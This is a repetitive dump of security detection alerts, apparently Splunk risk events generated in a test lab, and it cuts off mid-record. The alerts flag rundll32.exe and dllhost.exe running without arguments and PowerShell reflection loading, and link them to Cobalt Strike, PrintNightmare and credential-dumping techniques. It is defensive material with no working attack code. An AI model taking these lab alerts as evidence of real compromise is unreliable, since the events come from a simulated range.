annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="2084", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664802000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664802000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x824", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664802000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664802000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x107c", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664798400, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664798400", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="powershell.exe", process="C:\\Windows\\syswow64\\rundll32.exe", process_id="19124", process_name="rundll32.exe", process_path="C:\\Windows\\SysWOW64\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664798400, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664798400", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\rundll32.exe", process_id="19124", process_name="rundll32.exe", process_path="C:\\Windows\\SysWOW64\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664798400, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664798400", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="powershell.exe", process="C:\\Windows\\syswow64\\rundll32.exe", process_id="15100", process_name="rundll32.exe", process_path="C:\\Windows\\SysWOW64\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664798400, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664798400", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\rundll32.exe", process_id="15100", process_name="rundll32.exe", process_path="C:\\Windows\\SysWOW64\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664798400, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664798400", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\rundll32.exe", process_id="14740", process_name="rundll32.exe", process_path="C:\\Windows\\SysWOW64\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664798400, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664798400", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="powershell.exe", process="C:\\Windows\\syswow64\\rundll32.exe", process_id="0x4ab4", process_name="rundll32.exe", process_path="C:\\Windows\\SysWOW64\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664798400, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664798400", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\rundll32.exe", process_id="0x4ab4", process_name="rundll32.exe", process_path="C:\\Windows\\SysWOW64\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664798400, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664798400", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="powershell.exe", process="C:\\Windows\\syswow64\\rundll32.exe", process_id="0x3afc", process_name="rundll32.exe", process_path="C:\\Windows\\SysWOW64\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664798400, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664798400", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\rundll32.exe", process_id="0x3afc", process_name="rundll32.exe", process_path="C:\\Windows\\SysWOW64\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664798400, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664798400", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\rundll32.exe", process_id="0x3994", process_name="rundll32.exe", process_path="C:\\Windows\\SysWOW64\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664805332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T12:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T12:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664805332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": 